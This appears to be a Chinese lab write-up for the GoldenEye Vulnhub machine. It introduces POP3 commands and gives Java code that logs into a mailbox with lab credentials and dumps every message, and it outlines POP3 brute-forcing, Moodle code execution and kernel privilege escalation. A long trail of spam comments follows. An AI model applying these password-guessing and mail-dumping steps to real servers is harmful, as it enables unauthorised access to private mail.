Java Exploit编写——GoldenEye篇（上）

前段时间在Freebuf上读到大佬的《OSCP学习经验分享》，其中推荐了一些vulnhub上的靶机，笔者下载了排在其中第一位的GoldenEye靶机，并进行了一波渗透，编写了相应的漏洞利用程序（Exploit）。

鄙人学艺不精，但是对Java编程有所了解，参见了某国外大佬的WriteUP，写下了一套Exploit。

WriteUp中主要使用了简单的社会工程技巧来收集账户信息，暴力破解POP3口令，在邮件中检索信息最终登录站点超管账号，利用了Moodle2.2.3的拼写检查引擎来远程执行代码，最终利用Overlayfs漏洞成功提权，拿下root。

0x00 POP3协议简介

POP3(Post Office Protocol 3)，是一种基于TCP协议的电子邮件协议，默认端口为110 。

POP3常用命令列表，更多命令请参见POP3百度百科

USER <用户名> #指定要认证的用户名

PASS <密码> #输入密码

STAT # 请求邮箱的统计资料，如邮件总数和总字节数

LIST #列出邮件简略信息

RETR <编号> #请求编号对应的邮件正文

0x01 批量dump邮件思路

获取邮件正文主要过程如下

用户认证 -> 请求邮件统计信息 -> 读取所有邮件正文

因为POP3的认证过程比较简单，可以自己非常方便地编写一个爆破脚本，主要过程如下（比较简单，可以自己试着动手实现）

1.USER命令指定用户名

2.PASS命令验证密码

3.根据服务器响应，判断认证结果

认证通过后，下载邮件正文

4.STAT命令获取邮件统计信息

5.RETR命令遍历邮箱，下载邮件

0x02 代码编写

这里用Java编写一个POP3类来实现邮件相关的操作

import java.io.*;
import java.net.InetSocketAddress;
import java.net.Socket;
import java.net.SocketAddress;

public class POP3 {
    private Socket socket = new Socket(); //初始化一个Socket，后续建立网络连接
    private BufferedReader br = null;
    private BufferedWriter bw = null;

    //连接到POP3服务器 
    public boolean connect(String host,int port) {
        try {
            SocketAddress sa = new InetSocketAddress(host,port);
            this.socket.connect(sa,5); //使用SA来连接，可以设置超时

            //初始化br和bw用于输入输出
            this.br = new BufferedReader(
                    new InputStreamReader(socket.getInputStream())
            );
            this.bw = new BufferedWriter(
                    new OutputStreamWriter(socket.getOutputStream())
            );
            System.out.println("[+] 连接成功");
            return true;
        } catch (IOException e) {
            //e.printStackTrace();
            System.out.println("[-] 连接失败");
        }
        return false;
    }

    //用户认证
    public boolean login(String user,String pass){
        try {
            //读掉Banner
            br.readLine();

            bw.write("USER " + user); //输入用户名
            bw.newLine(); //回车
            bw.flush(); //刷新缓冲区，使命令马上发送

            if (br.readLine().toUpperCase().contains("OK")) {
                bw.write("PASS " + pass); //输入密码
                bw.newLine();
                bw.flush();
                if (br.readLine().toUpperCase().contains("OK")) { //服务端返回OK+则成功
                    System.out.println("[+] 认证成功");
                    return true;
                } else   {
                    System.out.println("[+] 认证失败");
                }
            }
        } catch (IOException e) {
            //e.printStackTrace();
            System.out.println("[+] 认证异常"); 
        }
        return false;
    }

    //下载邮件正文
    public void dumpMail() {
        try {
            bw.write("STAT"); //请求邮件统计信息
            bw.newLine();
            bw.flush();
            //获取邮件总数
            int num = Integer.valueOf(br.readLine().split(" ")[1]);
            //遍历邮件
            for (int i=1;i <=num;i++) {
                System.out.println("[+] 第"+ i +"封邮件");
                bw.write("RETR " + i); //获取邮件正文
                bw.newLine();
                bw.flush();
                String line = null;
                //读出邮件正文
                while ((line = br.readLine()) != null) {
                    if (!line.startsWith(".")) {
                        System.out.println(line);
                    } else {
                        break;
                    }
                }
            }
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}

在main方法中实例化POP3对象，下载邮件

public class Main {
    public static void main(String[] args) {
        POP3 pop3 = new POP3();
        pop3.connect("192.168.180.130",55007);//靶机IP，端口
        if (pop3.login("natalya","bird")){
            pop3.dumpMail();
        }
    }
}

0x03 编译代码，运行

javac Main.java
java Main

0x04 结语

感谢阅读。POP3协议比较简单，爆破和进行一些自动化操作也比较容易，很适合新手拿来练手，深入地了解应用层协议的通信过程。SMTP协议的爆破请参考笔者高中时攥写的另一篇文章。

Tags: Java POP3爆破渗透测试

bangladesh passport renewal说道：

2022年5月29日上午4:05

I really like and appreciate your blog post.Thanks Again. Keep writing.

回复
Best laptop for Minecraft说道：

2022年5月29日下午2:20

Muchos Gracias for your article post.Much thanks again. Awesome.

回复
hub说道：

2022年5月29日下午3:16

bonjour I love Your Blog can not say I come here often but im liking what i c so far….

回复
www.quranicwazifa.com/说道：

2022年5月29日下午4:24

Fantastic post.Really looking forward to read more. Great.

回复
hoa don dien tu说道：

2022年6月1日上午11:36

Bardzo interesujące informacje! Idealnie to, czego szukałem! przenośny generator tlenu.

回复
vibrator review说道：

2022年6月1日下午9:40

Wow, great article post.Really looking forward to read more. Keep writing.

回复
เครดิตฟรีไม่ต้องฝากไม่ต้องแชร์ 2022说道：

2022年6月3日上午6:01

Very good blog post.Thanks Again. Great.

回复
4movierulz说道：

2022年6月5日下午5:13

A big thank you for your post.Thanks Again. Will read on…

回复
car detailing kansas city说道：

2022年6月8日下午7:39

Fantastic article post.Much thanks again. Awesome.

回复
cover cd说道：

2022年6月9日上午6:34

atorvastatin 40 how long does it take to lower cholesterol with lipitor

回复
judi slot monster bola说道：

2022年6月9日下午3:51

Appreciate you sharing, great post.Really thank you! Much obliged.

回复
powerful wand vibrator说道：

2022年6月10日下午10:56

Muchos Gracias for your article.Really looking forward to read more. Cool.

回复
techyseva说道：

2022年6月11日下午4:04

Fantastic blog article.Much thanks again.

回复
assignment help experts说道：

2022年6月12日下午4:39

I loved your article.Much thanks again. Awesome.

回复
Pickleball Court说道：

2022年6月14日下午10:27

Appreciate you sharing, great blog article.Really looking forward to read more. Keep writing.

回复
poster colour说道：

2022年6月15日下午6:26

A round of applause for your post.Really looking forward to read more. Great.

回复
diploma of work health and safety online说道：

2022年6月18日下午3:39

Thank you ever so for you post.Thanks Again. Cool.

回复
work health and safety courses online说道：

2022年6月21日下午11:59

Great blog article.Really looking forward to read more. Really Great.

回复
slotv9omg说道：

2022年6月24日上午12:51

ซึ่งมีเกมนานาประการให้เลือก หรืออาจเป็นเครื่องวิดีโอโป๊กเกอร์ซึ่งมีเกมเดียวสล็อตแมชชีนเป็นต้นแบบการเดิมพันที่ขึ้นกับจังหวะ ผู้เล่นใส่เงินเข้าไปในเครื่องแล้วเลือกสัญลักษณ์ปริมาณหนึ่งบนหน้าจอ
เมื่อเลือกสัญลักษณ์แล้วในโลกของการเล่นเกมคาสิโน สล็อตครอบครองสถานที่ที่ไม่มีใครเหมือน พวกเขาเป็นเกมคาสิโนที่ได้รับความนิยมสูงที่สุด

回复
Online Marketing Service说道：

2022年6月29日上午10:34

Fantastic piece of writing here1

回复
commercial dumpster rental service说道：

2022年6月29日下午2:52

Write more stories, more chapters.

回复
situs judi bola terpercaya 2019说道：

2022年6月29日下午6:57

Thank you ever so for you blog post.Really thank you! Much obliged.

回复
Project management tools说道：

2022年7月2日下午8:23

Thank you ever so for you article post.Thanks Again. Cool.

回复
how to help veterans说道：

2022年7月4日上午4:35

Fantastic article.Much thanks again. Fantastic.

回复
company complaints说道：

2022年7月4日下午11:11

Great article.Thanks Again. Want more.

回复
Eyebrows说道：

2022年7月6日下午5:04

Very neat post.Really thank you! Fantastic.

回复
viral rose clit sucker说道：

2022年7月7日上午4:24

Enjoyed every bit of your post.Much thanks again. Keep writing.

回复
Gift for Dad Ideas说道：

2022年7月7日上午8:29

Bardzo interesujący temat, dziękuję za wysłanie wiadomości urządzenie do treningu oddechu urządzenie do treningu oddechu.

回复
Hair Extensions说道：

2022年7月9日上午2:57

Looking forward to reading more. Great blog article.Thanks Again. Much obliged.

回复
pala coin说道：

2022年7月12日下午4:45

I loved your blog.Really looking forward to read more. Fantastic.

回复
download lagu denyut jantungku berdebar说道：

2022年7月12日下午6:30

I could not refrain from commenting. Very well written!

回复
robot hut bui deebot说道：

2022年7月14日上午6:49

mail order erectile dysfunction pills: male erectile pills order erectile dysfunction pills online

回复
Fake Thai ID说道：

2022年7月14日下午2:22

Thank you for sharing indeed great looking !

回复
download mp3 terbaru说道：

2022年7月15日下午2:08

bookmarked!!, I love your site.

回复
you could look here说道：

2022年7月15日下午10:39

Thank you ever so for you blog post.Really looking forward to read more. Really Cool.

回复
Sub-Zero Refrigerator repair in Orange County说道：

2022年7月15日下午10:44

cannabidiol oil sale cbd capsules best cbd oil for pain reviews

回复
outsourcing contable bogot?说道：

2022年7月20日上午12:13

Terrific posts. Many thanks. homeworkcourseworkhelp.com personal statement college essay

回复
cau nang rua xe o to说道：

2022年7月20日下午1:21

สล็อตออนไลน์เกมคาสิโนยอดนิยมชั่วกัลปวสาน เล่นง่าย แจ็คพอตแตกไวจะต้องที่ จ่ายจริง จ่ายเต็ม มีเกมให้เลือกล้นหลามทั้งยังพนันบอล บาคาร่า ยิงปลา มาเว็บแห่งนี้เว็บเดียวบอกเลยจ้าขอรับว่าโคตรคุ้ม สร้างรายได้กล้วยๆจบที่เว็บ ได้เลยจ๊าขอรับ

回复
مانا说道：

2022年7月24日下午5:16

Thank you for your article.Really looking forward to read more. Want more.

回复
Slot deposit dana说道：

2022年7月27日上午3:36

Great article. Will read on…

回复
Mp3Juices说道：

2022年8月2日上午2:10

Fantastic blog post.Really thank you! Great.

回复
neodymium iron boron说道：

2022年8月2日上午6:15

Wow, great blog post.Really looking forward to read more. Really Cool.

回复
movies wood说道：

2022年8月2日上午6:40

Very good post.

回复
Queratocono说道：

2022年8月2日下午12:50

takipçi yagiyooooooooooooooooooo ?? 3100 tane geldiLoading…

回复
7starhdwatch.com说道：

2022年8月3日上午6:36

Very good post.

回复
Kelvin Kaemingk LoanDepot说道：

2022年8月9日下午8:40

Wow, great blog.Thanks Again. Really Cool.

回复
nuestra empresa说道：

2022年8月11日上午8:51

Just stumble upon your blog from from time to time. nice article

回复
space touch说道：

2022年8月11日下午4:59

purchase term paper – pay for essay essay about service

回复
but bi xanh说道：

2022年8月12日下午10:11

Hello! Do you use Twitter? I’d like to follow you ifthat would be ok. I’m undoubtedly enjoying yourblog and look forward to new updates.

回复
Paul Cole说道：

2022年8月16日下午2:26

hydroxychloroquine pills hydroxychloride medicine

回复
Orlando heavy transport说道：

2022年8月25日上午3:38

What a great article.. i subscribed btw!

回复
stroitelstvo domov pod kluch说道：

2022年8月25日下午3:06

wanted to provide you with a quick heads up! Apart from

回复
Leonardboype说道：

2022年8月26日上午8:07

Демонтаж стен москва

回复
mp3juice说道：

2022年8月30日下午3:10

I was able to find good advice from your articles.

回复
leer mas说道：

2022年9月3日上午3:20

Do you offer workshops?

回复
slotbonus777说道：

2022年9月5日下午3:44

แต่ว่าก็มีข้อตื่นตระหนกบางประการเกี่ยวกับคาสิโน บางคนคัดค้านว่าคาสิโนมีส่วนนำมาซึ่งการก่อให้เกิดการตำหนิดการพนันและปัญหาภายในสังคม อย่างเช่น อาชญากรรมรวมทั้งหนี้สินที่เกี่ยวพันกับการเดิมพัน ผู้อื่นโต้วาทีว่าคาสิโนเป็นลักษณะของการปกป้องผู้บริโภครวมทั้งควรได้รับการควบคุมเพื่อคุ้มครองผู้บริโภคสล็อตแมชชีนยอดเยี่ยมในเกมคาสิโนที่ได้รับความนิยมมากที่สุดในโลก สล็อตแมชชีนมีมาตั้งแต่ยุคแรกๆของคาสิโน

回复
singha89说道：

2022年9月6日上午5:03

เพื่อสร้างรายได้ที่ง่ายและรวดเร็วทันใจ เมื่อเวลาผ่านไป เครื่องก็เข้าถึงได้ง่ายขึ้นสำหรับผู้เล่นทั่วไป และวันนี้เจอได้ในคาสิโนอีกทั้งทางบกและออนไลน์สล็อตแมชชีนเป็นแบบอย่างการพนันคาสิโนยอดนิยม ซึ่งพบได้ทั้งในคาสิโนออนไลน์แล้วก็ทางบก โดยธรรมดาจะเป็นเครื่องจักรง่ายๆที่ช่วยให้ผู้เล่นวางเดิมพันกับผลสรุปของเกมที่ต่างกันจำนวนหนึ่ง เมื่อผู้เล่นชนะ เครื่องจะจ่ายเป็นจำนวนเงินที่กำหนดไว้ตามการเดิมพัน

回复
menu gator说道：

2022年9月7日上午5:24

Really informative blog article.Really thank you! Much obliged.

回复
slot888omg说道：

2022年9月11日上午1:08

บางคนคัดค้านว่าเครื่องสล็อตเสพติดและก็อาจทำให้เป็นอันตรายต่อความยั่งยืนและมั่นคงทางด้านการเงินของบุคคล บุคคลอื่นโต้เถียงว่าเครื่องสล็อตเป็นแบบอย่างการพนันที่ถูกตามกฎหมายซึ่งเป็นแบบการพนันที่ไม่ได้รับอนุญาตในเขตอำนาจศาลหลายที่ เครื่องสล็อตเป็นแบบอย่างการเดิมพันที่สล็อตแมชชีนเป็นเครื่องพนันชนิดหนึ่งที่เจอในคาสิโนรวมทั้งที่อื่นๆที่อนุญาตให้เล่นการเดิมพันได้

回复
cap chong gu说道：

2022年9月13日下午9:45

where can i get hydroxychloroquine chloroquine phosphate tablet

回复
Richardgax说道：

2022年9月14日下午9:31

타오바오구매대행

回复
BruceAboky说道：

2022年9月15日下午6:31

미국배대지

回复
ytmp3说道：

2022年9月16日下午8:15

I used to be able to find good information from your articles.

回复
article rewrite tool说道：

2022年9月17日下午5:34

%%

回复
Plumber New York City Cost说道：

2022年9月19日下午11:06

Awesome article.

回复
Harley说道：

2022年9月22日下午9:47

%%

回复
Bounce house rentals Scottsdale AZ说道：

2022年9月22日下午11:45

hot canadian pharmacy online pharmacy canada reviews

回复
to get more information说道：

2022年9月24日上午6:24

I’ll right away snatch your rss as I can’t to find youre-mail subscription hyperlink or e-newsletter service. Do you have any?Please permit me realize in order that I may just subscribe.Thanks.

回复
Khong gian bep Vifuta说道：

2022年9月25日上午12:37

ivermectin for ear mites in dogs ivermectin for heartworms in dogs

回复
article rewrite tool说道：

2022年9月28日下午9:23

%%

回复